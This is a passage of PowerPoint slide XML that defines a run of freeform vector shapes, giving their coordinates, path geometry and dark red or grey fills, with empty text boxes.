                    <a:gd name="T0" fmla="*/ 32 w 32"/>
                    <a:gd name="T1" fmla="*/ 29 h 60"/>
                    <a:gd name="T2" fmla="*/ 32 w 32"/>
                    <a:gd name="T3" fmla="*/ 60 h 60"/>
                    <a:gd name="T4" fmla="*/ 0 w 32"/>
                    <a:gd name="T5" fmla="*/ 29 h 60"/>
                    <a:gd name="T6" fmla="*/ 0 w 32"/>
                    <a:gd name="T7" fmla="*/ 0 h 60"/>
                    <a:gd name="T8" fmla="*/ 32 w 32"/>
                    <a:gd name="T9" fmla="*/ 29 h 60"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 32"/>
                    <a:gd name="T16" fmla="*/ 0 h 60"/>
                    <a:gd name="T17" fmla="*/ 32 w 32"/>
                    <a:gd name="T18" fmla="*/ 60 h 60"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="32" h="60">
                      <a:moveTo>
                        <a:pt x="32" y="29"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="32" y="60"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32" y="29"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="600000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10906" name="Freeform 312"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2606" y="3280"/>
                  <a:ext cx="34" cy="60"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 32 h 60"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 60 h 60"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 30 h 60"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 60"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 32 h 60"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 60"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 60 h 60"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="60">
                      <a:moveTo>
                        <a:pt x="34" y="32"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="60"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="32"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10907" name="Freeform 313"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="3318"/>
                  <a:ext cx="29" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 29"/>
                    <a:gd name="T1" fmla="*/ 29 h 56"/>
                    <a:gd name="T2" fmla="*/ 29 w 29"/>
                    <a:gd name="T3" fmla="*/ 56 h 56"/>
                    <a:gd name="T4" fmla="*/ 0 w 29"/>
                    <a:gd name="T5" fmla="*/ 28 h 56"/>
                    <a:gd name="T6" fmla="*/ 0 w 29"/>
                    <a:gd name="T7" fmla="*/ 0 h 56"/>
                    <a:gd name="T8" fmla="*/ 29 w 29"/>
                    <a:gd name="T9" fmla="*/ 29 h 56"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 29"/>
                    <a:gd name="T16" fmla="*/ 0 h 56"/>
                    <a:gd name="T17" fmla="*/ 29 w 29"/>
                    <a:gd name="T18" fmla="*/ 56 h 56"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="29" h="56">
                      <a:moveTo>
                        <a:pt x="29" y="29"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="29" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="29"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10908" name="Freeform 314"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2676" y="3415"/>
                  <a:ext cx="40" cy="70"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 40 w 40"/>
                    <a:gd name="T1" fmla="*/ 38 h 70"/>
                    <a:gd name="T2" fmla="*/ 40 w 40"/>
                    <a:gd name="T3" fmla="*/ 70 h 70"/>
                    <a:gd name="T4" fmla="*/ 0 w 40"/>
                    <a:gd name="T5" fmla="*/ 31 h 70"/>
                    <a:gd name="T6" fmla="*/ 0 w 40"/>
                    <a:gd name="T7" fmla="*/ 0 h 70"/>
                    <a:gd name="T8" fmla="*/ 40 w 40"/>
                    <a:gd name="T9" fmla="*/ 38 h 70"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 40"/>
                    <a:gd name="T16" fmla="*/ 0 h 70"/>
                    <a:gd name="T17" fmla="*/ 40 w 40"/>
                    <a:gd name="T18" fmla="*/ 70 h 70"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="40" h="70">
                      <a:moveTo>
                        <a:pt x="40" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="40" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="38"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10909" name="Freeform 315"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2642" y="3383"/>
                  <a:ext cx="32" cy="62"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 32 w 32"/>
                    <a:gd name="T1" fmla="*/ 31 h 62"/>
                    <a:gd name="T2" fmla="*/ 32 w 32"/>
                    <a:gd name="T3" fmla="*/ 62 h 62"/>
                    <a:gd name="T4" fmla="*/ 0 w 32"/>
                    <a:gd name="T5" fmla="*/ 30 h 62"/>
                    <a:gd name="T6" fmla="*/ 0 w 32"/>
                    <a:gd name="T7" fmla="*/ 0 h 62"/>
                    <a:gd name="T8" fmla="*/ 32 w 32"/>
                    <a:gd name="T9" fmla="*/ 31 h 62"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 32"/>
                    <a:gd name="T16" fmla="*/ 0 h 62"/>
                    <a:gd name="T17" fmla="*/ 32 w 32"/>
                    <a:gd name="T18" fmla="*/ 62 h 62"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="32" h="62">
                      <a:moveTo>
                        <a:pt x="32" y="31"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="32" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32" y="31"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="600000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10910" name="Freeform 316"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2606" y="3348"/>
                  <a:ext cx="34" cy="62"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 34 h 62"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 62 h 62"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 28 h 62"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 62"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 34 h 62"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 62"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 62 h 62"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="62">
                      <a:moveTo>
                        <a:pt x="34" y="34"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="34"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10911" name="Freeform 317"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2677" y="3057"/>
                  <a:ext cx="38" cy="54"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 38 w 38"/>
                    <a:gd name="T1" fmla="*/ 23 h 54"/>
                    <a:gd name="T2" fmla="*/ 38 w 38"/>
                    <a:gd name="T3" fmla="*/ 54 h 54"/>
                    <a:gd name="T4" fmla="*/ 0 w 38"/>
                    <a:gd name="T5" fmla="*/ 31 h 54"/>
                    <a:gd name="T6" fmla="*/ 0 w 38"/>
                    <a:gd name="T7" fmla="*/ 0 h 54"/>
                    <a:gd name="T8" fmla="*/ 38 w 38"/>
                    <a:gd name="T9" fmla="*/ 23 h 54"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 38"/>
                    <a:gd name="T16" fmla="*/ 0 h 54"/>
                    <a:gd name="T17" fmla="*/ 38 w 38"/>
                    <a:gd name="T18" fmla="*/ 54 h 54"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="38" h="54">
                      <a:moveTo>
                        <a:pt x="38" y="23"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="38" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38" y="23"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10912" name="Freeform 318"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2704" y="3110"/>
                  <a:ext cx="12" cy="38"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12 w 12"/>
                    <a:gd name="T1" fmla="*/ 8 h 38"/>
                    <a:gd name="T2" fmla="*/ 12 w 12"/>
                    <a:gd name="T3" fmla="*/ 38 h 38"/>
                    <a:gd name="T4" fmla="*/ 0 w 12"/>
                    <a:gd name="T5" fmla="*/ 30 h 38"/>
                    <a:gd name="T6" fmla="*/ 0 w 12"/>
                    <a:gd name="T7" fmla="*/ 0 h 38"/>
                    <a:gd name="T8" fmla="*/ 12 w 12"/>
                    <a:gd name="T9" fmla="*/ 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8"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="8"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10913" name="Freeform 319"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2677" y="3201"/>
                  <a:ext cx="38" cy="58"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 38 w 38"/>
                    <a:gd name="T1" fmla="*/ 27 h 58"/>
                    <a:gd name="T2" fmla="*/ 38 w 38"/>
                    <a:gd name="T3" fmla="*/ 58 h 58"/>
                    <a:gd name="T4" fmla="*/ 0 w 38"/>
                    <a:gd name="T5" fmla="*/ 30 h 58"/>
                    <a:gd name="T6" fmla="*/ 0 w 38"/>
                    <a:gd name="T7" fmla="*/ 0 h 58"/>
                    <a:gd name="T8" fmla="*/ 38 w 38"/>
                    <a:gd name="T9" fmla="*/ 27 h 58"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 38"/>
                    <a:gd name="T16" fmla="*/ 0 h 58"/>
                    <a:gd name="T17" fmla="*/ 38 w 38"/>
                    <a:gd name="T18" fmla="*/ 58 h 58"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="38" h="58">
                      <a:moveTo>
                        <a:pt x="38" y="27"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="38" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38" y="27"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10914" name="Rectangle 320"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2715" y="3379"/>
                  <a:ext cx="18" cy="32"/>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915" name="Freeform 321"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2550" y="2912"/>
                  <a:ext cx="278" cy="79"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 278"/>
                    <a:gd name="T1" fmla="*/ 0 h 79"/>
                    <a:gd name="T2" fmla="*/ 119 w 278"/>
                    <a:gd name="T3" fmla="*/ 6 h 79"/>
                    <a:gd name="T4" fmla="*/ 278 w 278"/>
                    <a:gd name="T5" fmla="*/ 75 h 79"/>
                    <a:gd name="T6" fmla="*/ 168 w 278"/>
                    <a:gd name="T7" fmla="*/ 79 h 79"/>
                    <a:gd name="T8" fmla="*/ 0 w 278"/>
                    <a:gd name="T9" fmla="*/ 0 h 79"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 278"/>
                    <a:gd name="T16" fmla="*/ 0 h 79"/>
                    <a:gd name="T17" fmla="*/ 278 w 278"/>
                    <a:gd name="T18" fmla="*/ 79 h 79"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="278" h="79">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="119" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="75"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="79"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10916" name="Freeform 322"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2719" y="2985"/>
                  <a:ext cx="108" cy="59"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 w 108"/>
                    <a:gd name="T1" fmla="*/ 1 h 59"/>
                    <a:gd name="T2" fmla="*/ 108 w 108"/>
